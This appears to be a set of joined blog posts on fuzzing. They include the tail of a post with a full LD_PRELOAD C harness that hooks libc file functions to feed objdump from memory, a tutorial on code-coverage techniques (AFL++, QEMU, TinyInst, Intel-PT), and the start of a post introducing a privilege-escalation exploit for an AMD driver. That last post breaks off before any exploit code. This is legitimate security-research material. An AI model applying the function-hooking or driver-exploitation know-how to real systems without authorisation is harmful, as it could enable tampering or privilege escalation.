write(1, "** __fxstat() called for __filed"..., 42) = 42
exit_group(0)                           = ?
+++ exited with 0 +++

Now we can flesh out our __fxstat() hook with some logic. The caller is hoping to retrieve a stat struct from the function for our fuzzing target fuzzme by passing the special file descriptor 1337. Luckily, we have our global stat struct that we can return after we update its size to match that of the current input in memory (as tracked by us and the fuzzer as the value at INPUT_SIZE_ADDR). So if called, we simply update our stat struct size, and memcpy our struct into their *__stat_buf. Our complete hook now looks like this:

// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    // Resolve the real fxstat
    if (NULL == real_fxstat) {
        real_fxstat = _resolve_symbol("__fxstat");
    }

    int ret = -1;

    // Check to see if we're stat'ing our fuzz target
    if (1337 == __filedesc) {
        // Patch the global struct with current input size
        st.st_size = *(size_t*)INPUT_SZ_ADDR;

        // Copy global stat struct back to caller
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Normal stat, send to real fxstat
    else {
        ret = real_fxstat(__ver, __filedesc, __stat_buf);
    }

    return ret;
}

Now if we run this, we actually don’t break and objdump is able exit cleanly under strace.

Wrapping Up

To test whether or not we have done a fair job, we will go ahead and output objdump -D fuzzme to a file, and then we’ll go ahead and output the same command but with our harness shared object loaded. Lastly, we’ll run objdump -D /bin/ed and output to a file to see if our harness created the same output.

h0mbre@ubuntu:~/blogpost$ objdump -D fuzzme > /tmp/fuzzme_original.txt      
h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/harness.txt 
h0mbre@ubuntu:~/blogpost$ objdump -D /bin/ed > /tmp/ed.txt

Then we sha1sum the files:

h0mbre@ubuntu:~/blogpost$ sha1sum /tmp/fuzzme_original.txt /tmp/harness.txt /tmp/ed.txt 
938518c86301ab00ddf6a3ef528d7610fa3fd05a  /tmp/fuzzme_original.txt
add4e6c3c298733f48fbfe143caee79445c2f196  /tmp/harness.txt
10454308b672022b40f6ce5e32a6217612b462c8  /tmp/ed.txt

We actually get three different hashes, we wanted the harness and /bin/ed to output the same output since /bin/ed is the input we loaded into memory.

h0mbre@ubuntu:~/blogpost$ ls -laht /tmp
total 14M
drwxrwxrwt 28 root   root   128K Apr  3 08:44 .
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 ed.txt
-rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 harness.txt
-rw-rw-r--  1 h0mbre h0mbre 2.2M Apr  3 08:42 fuzzme_original.txt

Ah, they are the same length at least, that must mean there is a subtle difference and diff shows us why the hashes aren’t the same:

h0mbre@ubuntu:~/blogpost$ diff /tmp/ed.txt /tmp/harness.txt 
2c2
< /bin/ed:     file format elf64-x86-64
---
> fuzzme:     file format elf64-x86-64

The name of the file in the argv[] array is different, so that’s the only difference. In the end we were able to feed objdump an input file, but have it actually take input from an in-memory buffer in our harness.

One more thing, we actually forgot that objdump closes our file didn’t we! So I went ahead and added a quick fclose() hook. We wouldn’t have any problems if fclose() just wanted to free the heap memory associated with our fmemopen() returned FILE *; however, it would also probably try to call close() on that wonky file descriptor as well and we don’t want that. It might not even matter in the end, just want to be safe. Up to the reader to experiment and see what changes. The imaginary fuzzer should restore FILE * heap memory anyways during its snapshot restoration routine.

Conclusion

There are a million different ways to accomplish this goal, I just wanted to walk you through my thought process. There are actually a lot of cool things you can do with this harness, one thing I’ve done is actually hook malloc() to fail on large allocations so that I don’t waste fuzzing cycles on things that will eventually timeout. You can also create an at_exit() choke point so that no matter what, the program executes your at_exit() function every time it is exiting which can be useful for snapshot resets if the program can take multiple exit paths as you only have to cover the one exit point.

Hopefully this was useful to some! The complete code to the harness is below, happy fuzzing!

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include <stdio.h> /* printf */
#include <sys/stat.h> /* stat */
#include <stdlib.h> /* exit */
#include <unistd.h> /* __xstat, __fxstat */
#include <dlfcn.h> /* dlsym and friends */
#include <sys/mman.h> /* mmap */
#include <string.h> /* memset */
#include <fcntl.h> /* open */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET     "fuzzme"

// Definitions for our in-memory inputs 
#define INPUT_SZ_ADDR   0x1336000
#define INPUT_ADDR      0x1337000
#define MAX_INPUT_SZ    (1024 * 1024)

// For testing purposes, we read /bin/ed into our input buffer to simulate
// what the fuzzer would do
#define  TEST_FILE      "/bin/ed"

// Our "legit" global stat struct
struct stat st;

// FILE * returned to callers of fopen64() 
FILE *faked_fp = NULL;

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Declare prototype for the real fopen and its friend fopen64 
typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
fopen_t real_fopen = NULL;

typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
fopen64_t real_fopen64 = NULL;

// Declare prototype for the real __fxstat
typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
__fxstat_t real_fxstat = NULL;

// Declare prototype for the real __fcntl
typedef int (*fcntl_t)(int fildes, int cmd, ...);
fcntl_t real_fcntl = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("** Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook for __xstat 
int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
    // Resolve the real __xstat() on demand and maybe multiple times!
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Assume the worst, always
    int ret = -1;

    // Special __ver value check to see if we're calling from constructor
    if (0x1337 == __ver) {
        // Patch back up the version value before sending to real xstat
        __ver = 1;

        ret = real_xstat(__ver, __filename, __stat_buf);

        // Set the real_xstat back to NULL
        real_xstat = NULL;
        return ret;
    }

    // Determine if we're stat'ing our fuzzing target
    if (!strcmp(__filename, FUZZ_TARGET)) {
        // Update our global stat struct
        st.st_size = *(size_t *)INPUT_SZ_ADDR;

        // Send it back to the caller, skip syscall
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Just a normal stat, send to real xstat
    else {
        ret = real_xstat(__ver, __filename, __stat_buf);
    }

    return ret;
}

// Exploratory hooks to see if we're using fopen() related functions to open
// our input file
FILE* fopen(const char* pathname, const char* mode) {
    printf("** fopen() called for '%s'\n", pathname);
    exit(0);
}

// Our fopen hook, return a FILE* to the caller, also, if we are opening our
// target make sure we're not able to write to the file
FILE* fopen64(const char* pathname, const char* mode) {
    // Resolve symbol on demand and only once
    if (NULL == real_fopen64) {
        real_fopen64 = _resolve_symbol("fopen64");
    }

    // Check to see what file we're opening
    FILE* ret = NULL;
    if (!strcmp(FUZZ_TARGET, pathname)) {
        // We're trying to open our file, make sure it's a read-only mode
        if (strcmp(mode, "r")) {
            printf("** Attempt to open fuzz-target in illegal mode: '%s'\n", mode);
            exit(-1);
        }

        // Open shared memory FILE* and return to caller
        ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
        
        // Make sure we've never fopen()'d our fuzzing target before
        if (faked_fp) {
            printf("** Attempting to fopen64() fuzzing target more than once\n");
            exit(-1);
        }

        // Update faked_fp
        faked_fp = ret;

        // Change the filedes to something we know
        ret->_fileno = 1337;
    }

    // We're not opening our file, send to regular fopen
    else {
        ret = real_fopen64(pathname, mode);
    }

    // Return FILE stream ptr to caller
    return ret;
}

// Hook for __fxstat
int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
    // Resolve the real fxstat
    if (NULL == real_fxstat) {
        real_fxstat = _resolve_symbol("__fxstat");
    }

    int ret = -1;

    // Check to see if we're stat'ing our fuzz target
    if (1337 == __filedesc) {
        // Patch the global struct with current input size
        st.st_size = *(size_t*)INPUT_SZ_ADDR;

        // Copy global stat struct back to caller
        memcpy(__stat_buf, &st, sizeof(struct stat));
        ret = 0;
    }

    // Normal stat, send to real fxstat
    else {
        ret = real_fxstat(__ver, __filedesc, __stat_buf);
    }

    return ret;
}

// Hook for fcntl
int fcntl(int fildes, int cmd, ...) {
    // Resolve fcntl symbol if needed
    if (NULL == real_fcntl) {
        real_fcntl = _resolve_symbol("fcntl");
    }

    if (fildes == 1337) {
        return O_RDONLY;
    }

    else {
        printf("** fcntl() called for real file descriptor\n");
        exit(0);
    }
}

// Map memory to hold our inputs in memory and information about their size
static void _create_mem_mappings(void) {
    void *result = NULL;

    // Map the page to hold the input size
    result = mmap(
        (void *)(INPUT_SZ_ADDR),
        sizeof(size_t),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
        printf("** Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Let's actually initialize the value at the input size location as well
    *(size_t *)INPUT_SZ_ADDR = 0;

    // Map the pages to hold the input contents
    result = mmap(
        (void *)(INPUT_ADDR),
        (size_t)(MAX_INPUT_SZ),
        PROT_READ | PROT_WRITE,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
        0,
        0
    );
    if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
        printf("** Err mapping INPUT_ADDR, mapped @ %p\n", result);
        exit(-1);
    }

    // Init the value
    memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
}

// Create a "legit" stat struct globally to pass to callers
static void _setup_stat_struct(void) {
    int result = __xstat(0x1337, FUZZ_TARGET, &st);
    if (-1 == result) {
        printf("** Err creating stat struct for '%s' during load\n", FUZZ_TARGET);
    }
}

// Used for testing, load /bin/ed into the input buffer and update its size info
#ifdef TEST
static void _test_func(void) {    
    // Open TEST_FILE for reading
    int fd = open(TEST_FILE, O_RDONLY);
    if (-1 == fd) {
        printf("** Failed to open '%s' during test\n", TEST_FILE);
        exit(-1);
    }

    // Attempt to read max input buf size
    ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);
    close(fd);

    // Update the input size
    *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;
}
#endif

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    // Create memory mappings to hold our input and information about its size
    _create_mem_mappings();

    // Setup global "legit" stat struct
    _setup_stat_struct();

    // If we're testing, load /bin/ed up into our input buffer and update size
#ifdef TEST
    _test_func();
#endif
}

Fuzzing Like A Caveman 5: A Code Coverage Tour for Cavepeople

The Human Machine Interface

h0mbre

16 January 2021 at 05:00

Introduction

We’ve already discussed the importance of code coverage previously in this series so today we’ll try to understand some of the very basic underlying concepts, some common approaches, some tooling, and also see what techniques some popular fuzzing frameworks are capable of leveraging. We’re going to shy away from some of the more esoteric strategies and try to focus on what would be called the ‘bread and butter’, well-trodden subject areas. So if you’re new to fuzzing, new to software testing, this blogpost should be friendly. I’ve found that a lot of the terminology used in this space is intuitive and easy to understand, but there are some outliers. Hopefully this helps you at least get on your way doing your own research.

We will do our best to not get bogged down in definitional minutiae, and instead will focus on just learning stuff. I’m not a computer scientist and the point of this blogpost is to merely introduce you to these concepts so that you can understand their utility in fuzzing. In that spirit, if you find any information that is misleading, egregiously incorrect, please let me know.

Thanks to all that have been so charitable on Twitter answering questions and helping me out along the way, people like: @gamozolabs, @domenuk, @is_eqv, @d0c_s4vage, and @naehrdine just to name a few :)

Core Definitions

One of the first things we need to do is get some definitions out of the way. These definitions will be important as we will build upon them in the subsequent explanations/explorations.

Code Coverage

Code coverage is any metric that gives you insight into how much of a program’s code has been reached by a test, input, etc. We won’t spend a lot of time here as we’ve already previously discussed code coverage in previous posts. Code coverage is very important to fuzzing as it allows you to keep track of how much surface area in the target program you are able to reach. You can imagine that if you only explore a small % of the program space, your testing might be limited in comprehensiveness.

Basic Blocks

Let’s get the Wikipedia definition out of the way first:

“In compiler construction, a basic block is a straight-line code sequence with no branches in except to the entry and no branches out except at the exit.”

So a ‘basic block’ is a code sequence that is executed linearly where there is no opportunity for the code execution path to branch into separate directions. Let’s come up with a visual example. Take the following dummy program that gets a password via the command line and then checks that it meets password length requirements:

#include <stdio.h>
#include <stdlib.h>

int length_check(char* password)
{
    long i = 0;
    while (password[i] != '\0')
    {
        i++;
    }

    if (i < 8 || i > 20)
    {
        return 0;
    }

    return 1;
}

int main(int argc, char *argv[])
{
    if (argc != 2)
    {
        printf("usage: ./passcheck <password>\n");
        printf("usage: ./passcheck mysecretpassword2021\n");
        exit(-1);
    }

    int result = length_check(argv[1]);

    if (!result)
    {
        printf("password does not meet length requirements\n");
        exit(-1);
    }

    else
    {
        printf("password meets length requirements\n");
    }
}

Once we get this compiled and analyzed in Ghidra, we can see the following graph view of main():

‘Blocks’ is one of those intuitive terms, we can see how the graph view automatically breaks down main() into blocks of code. If you look inside each block, you will see that code execution is unidirectional, there are no opportunities inside of a block to take two or more different paths. The code execution is on rails and the train track has no forks. You can see that blocks terminate in this example with conditional jumps (JZ, JNZ), main returning, and function calls to exit.

Edges/Branches/Transitions

‘Edge’ is one of those terms in CS/graph theory that I don’t think is super intuitive and I much prefer ‘Transition’ or ‘Branch’, but essentially this is meant to capture relationships between basic blocks. Looking back at our basic block graph from Ghidra, we can see that a few different relationships exist, that is to say that there are multiple pathways code execution can take depending on a few conditions.

Basic block 001006cf has a relationship with two different blocks: 001006e4 and 00100706. So code execution inside of 001006cf can reach either of the two blocks it has a relationship with depending on a condition. That condition in our case is the JZ operation depending on whether or not the number of command line arguments is 2:

if the number of arguments is not 2, we branch to block 001006e4 organically by just not taking the conditional jump (JZ)
if the number of arguments is 2, we branch to block 00100706 by taking the conditional jump

These two possibilities can be referred to as ‘Edges’, so block 01006cf has two edges. You can imagine how this might be important from the perspective of fuzzing. If our fuzzer is only ever exploring one of a basic block’s edges, we are leaving an entire branch untested so it would behoove us to track this type of information.

There’s apparently much more to this concept than I let on here, you can read more on the Wikipedia entry for Control-flow_graph.

Paths

‘Path’ is just the list of basic blocks our program execution traversed. Looking at our example program, there a few different paths as illustrated below with the orange, green and red lines.

Path One: 0x001006cf -> 0x001006e4

Path Two: 0x001006cf -> 0x00100706 -> 0x00100738

Path Three: 0x001006cf -> 0x00100706 -> 0x0000722

Instrumentation

In this blogpost, “Instrumentation” will refer to the process of equipping your fuzzing target with the ability to provide code coverage feedback data. This could mean lots of things. It could be as complex as completely rewriting a compiled binary blob that we have no source code for or as simple as placing a breakpoint on the address of every basic block entry address.

One of the important aspects of instrumentation to keep in mind is the performance penalty incurred by your instrumentation. If your instrumentation provides 50% more useful information than a technique that is 50% less useful but 1000x more performant, you have to consider the tradeoffs. The 50% more data might very well be worth the huge performance penalty, it just depends.

Binary Only

This is a simple one, “Binary Only” refers to targets that we don’t have source code for. So all we have to work with is a binary blob. It can be dynamically linked or static. These types of targets are more prevalent in certain environments, think embedded targets, MacOS, and Windows. There are still binary-only targets on Linux though, they’re just less common.

Even though “binary only” is simple to understand, the implications for gathering code coverage data are far-reaching. A lot of popular code coverage mechanisms rely upon having source code so that the target can be compiled in a certain way that lends itself well to gathering coverage data, for binary-only targets we don’t have the luxury of compiling the target the way that we want. We have to deal with the compiled target the way it is.

Common Strategies

In this section we’ll start looking at common strategies fuzzing tools utilize to gather code coverage data.

Tracking Basic Blocks

One of the most simple ways to gather code coverage is to simply track how many basic blocks are reached by a given input. You can imagine that we are exploring a target program with our inputs and we want to know what code has been reached. Well, we know that given our definition of basic blocks above, if we enter a basic block we will execute all of the code within, so if we just track whether or not a basic block has been reached, we will at least know what paths we have not yet hit and we can go manually inspect them.

This approach isn’t very sophisticated and kind of offers little in the way of high-fidelity coverage data; however, it is extremely simple to implement and works with all kinds of targets. Don’t have source? Throw some breakpoints on it. Don’t have time to write compiler code? Throw some breakpoints on it.

Performance wise, this technique is great. Hitting new coverage will entail hitting a breakpoint, removing the breakpoint and restoring the original contents that were overwritten during instrumentation, saving the input that reached the breakpoint, and continuing on. These events will actually be slow when they occur; however, as you progress through your fuzzing campaign, new coverage becomes increasingly rare. So there is an upfront cost that eventually decreases to near-zero as time goes by.

I’d say that in my limited experience, this type of coverage is typically employed against closed-source targets (binary-only) where our options are limited and this low-tech method works well enough.

Let’s check out @gamozolabs really fast Basic Block tracking coverage tool called Mesos. You can see that it is aimed at use on Windows where most targets will be binary-only. The neat thing about this tool is its performance. You can see his benchmark results in the README:

Registered    1000000 breakpoints in   0.162230 seconds |  6164072.8 / second
Applied       1000000 breakpoints in   0.321347 seconds |  3111897.0 / second
Cleared       1000000 breakpoints in   0.067024 seconds | 14920028.6 / second
Hit            100000 breakpoints in  10.066440 seconds |     9934.0 / second

One thing to keep in mind is that if you use this way of collecting coverage data, you might limit yourself to the first input that reaches a basic block. Say for instance we have the following code:

// input here is an unsigned char buff
if (input[0x9] < 220)
{
    parsing_routine_1(input);
}

else
{
    parsing_routine_2(input);
}

If our first input to reach this code has a value of 200 inside of input[0x9], then we will progress to the parsing_routine_1 block entry. We will remove our breakpoint at the entry of parsing_routine_1 and we will add the input that reached it to our corpus. But now that we’ve reached our block with an input that had a value of 200, we’re kind of married to that value as we will never hit this breakpoint again with any of the other values that would’ve reached it as well. So we’ll never save an input to the corpus that “solved” this basic block a different way. This can be important. Let’s say parsing_routine_1 then takes the entire input, and reads through the input byte-by-byte for the entirety of the input’s length and does some sort of lengthy parsing at each iteration. And let’s also say there are no subsequent routines that are highly stateful where large inputs vary drastically from smaller inputs in behavior. What if the first input we gave the program that solved this block is 1MB in size? Our fuzzers are kind of married to the large input we saved in the corpus and we were kind of unlucky that shorter input didn’t solve this block first and this could hurt performance.

One way to overcome this problem would be to just simply re-instantiate all of your breakpoints periodically. Say you have been running your fuzzer for 10 billion fuzz-cases and haven’t found any new coverage in 24 hours, you could at that point insert all of your already discovered breakpoints once again and try to solve the blocks in a different way perhaps saving a smaller more performant input that solved the block with a input[0x9] = 20. Really there a million different ways to solve this problem. I believe @gamozolabs addressed this exact issue before on Twitter but I wasn’t able to find the post.

All in all, this is a really effective coverage method especially given the variety of targets it works for and how simple it is to implement.

Tracking Edges and Paths

Tracking edges is very popular because this is the strategy employed by AFL and its children. This is the approach where we not only care about what basic blocks are being hit but also, what relationships are being explored between basic blocks.

The AFL++ stats output has references to both paths and edges and implicitly ‘counters’. I’m not 100% sure but I believe their definition of a ‘path’ matches up to ours above. I think they are saying that a ‘path’ is the same as a testcase in their documentation.

I won’t get too in-depth here analyzing how AFL and its children (really AFL++ is quite different than AFL) collect and analyze coverage for a simple reason: it’s for big brain people and I don’t understand much of it. If you’re interested in a more detailed breakdown, head on over to their docs and have a blast.

To track edges, AFL uses tuples of the block addresses involved in the relationship. So in our example program, if we went from block 0x001006cf to block 0x001006e4 because we didn’t provide the correct number of command line arguments, this tuple (0x001006cf , 0x001006e4) would be added to a coverage map AFL++ uses to track unique paths. So let’s track the tuples we would register if we traversed an entire path in our program:

0x001006cf -> 0x00100706 -> 0x00100722

If we take the above path, we can formulate two tuples of coverage data: (0x001006cf, 0x00100706) and (0x00100706, 0x00100722). These can be looked up in AFL’s coverage data to see if these relationships have been explored before.

Not only does AFL track these relationships, it also tracks frequency. So for instance, it is aware of how often each particular edge is reached and explored.

This kind of coverage data is way more complex than merely tracking basic blocks reached; however, getting this level of detail is also not nearly as straightforward.

In the most common case, AFL gets this data by using compile-time instrumentation on the target. You can compile your target, that you have source code for, using the AFL compiler which will emit compiled code with the instrumentation embedded in the target. This is extremely nifty. But it requires access to source code which isn’t always possible.

AFL has an answer for binary-only targets as well and leverages the powerful QEMU emulator to gather similarly detailed coverage data. Emulators have relatively free access to this type of data since they have to take the target instructions and either interpret them (which means simulate their execution) or JIT (just-in-time) compile the blocks into native code and execute them natively. In the case of QEMU here, blocks are JIT’d into native code and stored in a cache so that it could be easily used again by subsequent executions. So when QEMU comes upon a basic block, it can check whether or not this block has been compiled or not already and act accordingly. AFL utilizes this process to track what blocks are being executed and gets very similar data to what it gathers with compile time instrumentation.

I don’t understand all of the nuance here, but a great blogpost to read on the subject is: @abiondo’s post explaining an optimization they made to AFL QEMU mode in 2018. In a grossly short (hopefully not too inaccurate) summary, QEMU would pre-compute what are called direct jumps and compile those blocks into a single block essentially (via keeping execution in natively compiled blocks) as a way to speed things up. Take this toy example for instance:

ADD RAX, 0x8
JMP LAB_0x00100738

Here we have a pre-computable destination to our jump. We know the relative offset to LAB_0x00100738 from our current address (absolute value of current_addr - LAB_0x00100738), so in an emulator we could just take that jump and replace the destination to the compiled block of LAB_0x00100738 and no calculations would need to take place during each execution (only the initial one to calculate the relative offset). This would allow the emulator to progress with native execution without going back into what I would call a ‘simulation-mode’ where it has to calculate the address before jumping to it each time its executed. This is called “block-chaining” in QEMU. Well you can imagine that if this occurs, that huge block of natively executed code (that is really two blocks) is completely opaque to AFL as it’s unaware that two blocks are contained and so it cannot log the edge that was taken. So as a work around, AFL would patch QEMU to no longer do this block-chaining and keep every block isolated so that edges could be tracked. This would mean that at the end of every block, direct jump or not, QEMU would go back into that ‘simulation-mode’ which would incur a performance penalty.

Definitely read through @abiondo’s blogpost though, it’s much more informative.

If you’re wondering what an indirect jump would be, it would be something where the jump location is only known at execution time, something that could look like this in a toy example:

ADD RAX, 0x8
JMP RAX

The only issue with using QEMU to gather our coverage data is it is relatively slow compared to purely native execution. This slowdown can be worth it obviously as the amount of data you get is substantial and sometimes with binary-only targets there are no other alternatives.

Compare Coverage/Compare Shattering

Instead of merely tracking an input or test’s progress through a program’s blocks/edges, compare coverage seeks to understand how much progress our test is making in the program’s comparisons. Comparisons can be done different ways but a common one already exists in our example password program. In the 001006cf block, we have a CMP operation being performed here:

CMP dword ptr [RBP + local_1c], 0x2

A dword is a 4 byte value (32 bits) and this operation is taking our argc value in our program and comparing it with 0x2 to check how many command line arguments were provided. So our two comparison operands are whatever is on the stack at the offset RBP + local_1c and 0x2. If these operands are equal, the Zero Flag will be set and we can utilize a conditional jump with JZ to move accordingly in the program.

But the problem, as it relates to fuzzing, is that this comparison is rather binary. It either sets the Zero Flag or it does not, there is no nuance. We cannot tell how close we came to passing the comparison, to setting the Zero Flag.

So for example, let’s say we were doing a comparison with 0xdeadbeef instead of 0x2. In that case, if we were to submit 0xdeadbebe for the other operand, we’d be much closer to satisfying the JZ condition that we would be if we submitted 0x0.

At a high-level, compare coverage breaks this comparison down into chunks so that progress through the comparison can be tracked with more much granularity than a binary PASS/FAIL. So using compare coverage, this comparison might instead be rewritten as follows:

BEFORE:

Does 0xdeadbebe == 0xdeadbeef ?

AFTER:

Does 0xde == 0xde ? If so, log that we’ve matched the first byte, and

does 0xad == 0xad ? If so, log that we’ve matched the second byte, and

does 0xbe == 0xbe ? If so, log that we’ve matched the third byte, and

does 0xbe == 0xef ? If so, log that we’ve matched both operands completely.

In our AFTER rewrite, instead of getting a binary PASS/FAIL, we instead see that we progressed 75% of the way through the comparison matching 3 out of 4 bytes. Now we know that we can save this input and mutate it further hoping that we can pass the final byte comparison with a correct mutation.

We also aren’t restricted to only breaking down each comparison to bytes, we could instead compare the two operands at the bit-level. For instance we could’ve also compared them as follows:

1101 1110 1010 1101 1011 1110 1110 1111 vs

1101 1110 1010 1101 1011 1110 1011 1110

This could be broken down into 32 separate comparisons instead of our 4, giving us even more fidelity and progress tracking (probably at the expense of performance in practice).

Here we took a 4 byte comparison and broke it down into 4 separate single-byte comparisons. This is also known as “Compare Shattering”. In spirit, it’s very similar to compare coverage. It’s all about breaking down large comparisons into smaller chunks so that progress can be tracked with more fidelity.

Some fuzzers take all compare operands, like 0xdeadbeef in this example, and add them to a sort of magic values dictionary that the fuzzer will randomly insert it into its inputs hoping to pass the comparison in the future.

You can imagine a scenario where a program checks a large value before branching to a complex routine that needs to be explored. Passing these checks is extremely difficult with just basic coverage and would require a lot of human interaction. One could examine a colored graph in IDA that displayed reached blocks and try to manually figure out what was preventing the fuzzer from reaching unreached blocks and determine that a large 32 byte comparison was being failed. One could then adjust their fuzzer to account for this comparison by means of a dictionary or whatever, but this process is all very manual.

There are some really interesting/highly technical means to do this type of thing to both targets with source and binary-only targets!

AFL++ features an LLVM mode where you can utilize what they call “laf-intel instrumentation” which is described here and originally written about here. Straight from laf-intel’s blogpost, we can see their example looks extremely similar to the thought experiment we already went through where they have this source code:

if (input == 0xabad1dea) {
  /* terribly buggy code */
} else {
  /* secure code */
}

And this code snippet is ‘de-optimized’ into several smaller comparisons that the fuzzer can measure its progress through:

if (input >> 24 == 0xab){
  if ((input & 0xff0000) >> 16 == 0xad) {
    if ((input & 0xff00) >> 8 == 0x1d) {
      if ((input & 0xff) == 0xea) {
        /* terrible code */
        goto end;
      }
    }
  }
}

/* good code */

end:

This de-optimized code can be emitted when one opts to specify certain environment variables and utilizes afl-clang-fast to compile the target.

This is super clever and can really take tons of manual effort out of fuzzing.

But what are we to do when we don’t have access to source code and our binary-only target is possibly full of large comparisons?

Luckily, there are open-source solutions to this problem as well. Let’s look at one called “TinyInst” by @ifsecure and friends. I can’t get deep into how this tool works technically because I’ve never used it but the README is pretty descriptive!

As we can see, it is aimed at MacOS and Windows targets in-keeping with its purpose of instrumenting binary only targets. TinyInst gets us coverage by instrumenting select routines via debugger to change the execution permissions so that any execution (not read or write as these permissions are maintained) access to our instrumented code results in a fault which is then handled by the TinyInst debugger where code execution is redirected a re-written instrumented routine/module. So TinyInst blocks all execution of the original module and instead, redirects all that execution to a rewritten module that is inserted into the program. You can see how powerful this can be as it can allow for the breaking down of large comparisons into much smaller ones in a manner very similar to the laf-intel method but for a target that is already compiled. Look at this cool gif showing compare coverage in action from @ifsecure: [https://twitter.com/ifsecure/status/1298341219614031873?s=20]. You can see that he has a program that checks for an 8 byte value, and his fuzzer makes incremental progress through it until it has solved the comparison.

There are some other tools out there that work similarly in theory to TinyInst as well that are definitely worth looking at and they are also mentioned in the README, tools like: DynamoRIO and PIN.

It should also be mentioned that AFL++ also has the ability to do compare coverage tracking even in QEMU mode.

Bonus Land: Using Hardware to Get Coverage Data

That pretty much wraps up the very basics of what type of data we’re interested in, why, and how we might be able to extract it. One type of data extraction method that didn’t come up yet that is particularly helpful for binary-only targets is utilizing your actual hardware to get coverage data.

While it’s not really a ‘strategy’ as the others were, it enables the execution of the strategies mentioned above and wasn’t mentioned yet. We won’t get too deep here. Nowadays, CPUs come chock-full of all kinds of utilities that are aimed at high-fidelity performance profiling. These types of utilities can also be wrangled into giving us coverage data.

Intel-PT is a utility offered by newer Intel CPUs that allows you to extract information about the software you’re running such as control-flow. Each hardware thread has the ability to store data about the application it is executing. The big hang up with using processor trace is that decoding the trace data that is collected has always been painfully slow and cumbersome to work with. Recently however, @is_eqv and @ms_s3c were able to create a very performant library called libxdc which can be used to decode Intel-PT trace data performantly. The graph included in their README is very cool, you can see how much faster it is than the other hardware-sourced coverage guided fuzzing tools while also collecting the highest-fidelity coverage data, what they call “Full Edge Coverage”. Getting your coverage data straight from the CPU seems ideal haha. So for them to be able to engineer a library that gives you what is essentially perfect coverage, and by the way, doesn’t require source code, seems like a substantial accomplishment. I personally don’t have the engineering chops to deal with this type of coverage at the moment, but one day. A lot of popular fuzzers can utilize Intel-PT right out of the box, fuzzers like: AFL++, honggfuzz, and WinAFL.

There are many other such utilities but they are beyond the scope of this introductory blogpost.

Conclusion

In this post we went over some of the building-block terminology used in the space, some very common fundamental strategies that are employed to get meaningful coverage data, and also some of the tooling that is used to extract the data (and in some cases what fuzzing frameworks use what tooling). It should be mentioned that the popular fuzzing frameworks like AFL++ and honggfuzz go through great lengths to make their frameworks as flexible as possible and work with a wide breadth of targets. They often give you tons of flexibility to employ the coverage data extraction method that’s best suited to your situation. Hopefully this was somewhat helpful to begin to understand some of the problems associated with code coverage as it relates to fuzzing.

CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys

The Human Machine Interface

h0mbre

13 October 2020 at 04:00

Background

Earlier this year I was really focused on Windows exploit development and was working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn and eventually went bug hunting on my own.

I ended up discovering what could be described as a logic bug in the ATI Technologies Inc. driver ‘atillk64.sys’. Being new to the Windows driver bug hunting space, I didn’t realize that this driver had already been analyzed and classified as vulnerable by Jesse Michael and his colleague Mickey in their ‘Screwed Drivers’github repo. It had also been mentioned in several other places that have been pointed out to me since.

So I didn’t really feel like I had discovered my first real bug and decided to hunt similar bugs on Windows 3rd party drivers until I found my own in the AMD Ryzen Master AMDRyzenMasterDriver.sys version 15.

I have since stopped looking for these types of bugs as I believe they wouldn’t really help me progress skills wise and my goals have changed since.

Thanks

Huge thanks to the following people for being so charitable, publishing things, messaging me back, encouraging me, and helping me along the way:

AMD Ryzen Master

The AMD Ryzen Master Utility is a tool for CPU overclocking. The software purportedly supports a growing list of processors and allows users fine-grained control over the performance settings of their CPU. You can read about it here

AMD has published an advisory on their Product Security page for this vulnerability.

Vulnerability Analysis Overview

This vulnerability is extremely similar to my last Windows driver post, so please give that a once-over if this one lacks any depth and leaves you curious. I will try my best to limit the redudancy with the previous post.

All of my analysis was performed on Windows 10 Build 18362.19h1_release.190318-1202.

I picked this driver as a target because it is common of 3rd-party Windows drivers responsible for hardware configurations or diagnostics to make available to low-privileged users powerful routines that directly read from or write to physical memory.

Checking Permissions

